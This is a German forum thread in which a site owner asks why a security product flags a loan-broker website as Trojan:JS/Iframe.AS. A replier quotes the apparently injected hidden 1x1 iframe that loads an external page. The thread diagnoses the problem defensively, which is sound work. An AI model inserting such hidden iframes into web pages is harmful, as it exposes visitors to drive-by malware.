Angeblich Trojan:JS/Iframe.AS auf Webseite gefunden!

ynfinity

Lt. Commander
Moin,

ein Bekannter von mit hat Betreibt die Seite Finanzservice Neumann . Wenn man jetzt mit installiertem Microsoft Security Essentials und dem Internet Explorer auf die Seite geht gibt MSE folgende Warnung:

fehler-jpg.274971

Mit Firefox und MSE oder Internet Explorer und GData 2012/MSE kommt keine Warnmeldung.
Habe auch die URL Scannen lassen, ohne Befund.

virustotal-jpg.274972

Jemand eine Idee was das sein kann? Bzw. wie kann man das entfernen? Weil es gibt Kunden die die Seite mit IE und MSE
besuchen und dann natürlich keinen guten Eindruck bekommen wenn dann so eine Warnung losgeht.

Anhänge

• fehler.JPG
    fehler.JPG
    129,4 KB · Aufrufe: 2.396
  • virustotal.JPG
    virustotal.JPG
    111 KB · Aufrufe: 2.377
kredite für beamte ... wer weis was sich hinter dem Trojaner verbirgt oO

um welche Seite geht es hier kredite-fuer-beamte.de oder Finanzservice-Neumann.de?

hallo,
die meldung bezieht sich offensichtlich auf
<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>.
gibt aber ne 404.

Es geht um kredite-fuer-beamte.de der andere hat rein zufällig den gleichen Nachnamen und den gleichen Beruf.

mein Norten lässt mich drauf... aber ganz davon ab... die letzte Aktualisierung fand im Jahre 2008 statt... so eine Seite braucht auch ein potenzieller Kunde nicht.

/edit: kredite-fuer-beamte.de da hat mein Norten auch keine Fehler gemeldet. Auch Google Chrome nicht.

nein, es ist mehr dabei cookie + js kombi dabei, welche selbst tastenbefehle speeren; die warnmeldungen sind richtig!

@Sir_Sascha Finanzservice-Neumann.de ist 2008 zuletzt aktualisiert worden. Die Seite hat mit meiner nichts zu tun außer dem Nachnamen.